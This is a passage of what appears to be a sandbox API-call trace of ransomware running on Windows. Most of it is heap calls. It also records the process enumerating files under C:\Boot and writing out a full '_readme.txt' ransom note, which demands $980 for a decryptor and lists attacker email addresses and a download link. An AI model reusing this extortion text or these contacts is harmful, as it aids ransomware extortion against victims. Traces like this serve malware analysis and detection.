hHeap=0x2c0000) returned 1 [0183.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.934] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.935] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.937] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.938] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.938] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0183.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0183.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0183.943] PathFindFileNameW (pszPath="C:\\Boot\\ko-KR\\") returned="ko-KR\\" [0183.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.943] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.943] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.943] PathFindFileNameW (pszPath="") returned="" [0183.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.943] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.944] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.944] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0183.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.944] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.944] PathAppendW (in: pszPath="C:\\Boot\\ko-KR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 1 [0183.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.945] PathFileExistsW (pszPath="C:\\Boot\\ko-KR\\_readme.txt") returned 0 [0183.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0183.945] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.945] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0183.945] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\_readme.txt" (normalized: "c:\\boot\\ko-kr\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0183.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0183.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0183.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.947] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*" (normalized: "c:\\boot\\ko-kr\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0183.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.948] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.948] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.949] PathFindExtensionW (pszPath="C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned=".mui" [0183.949] CreateFileW (lpFileName="C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.951] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.951] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0183.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.952] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0183.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.952] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0183.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.957] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.957] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0183.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.959] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.962] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.963] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.963] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.966] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.966] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.967] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.967] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0183.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0183.971] RtlAllocateHeap 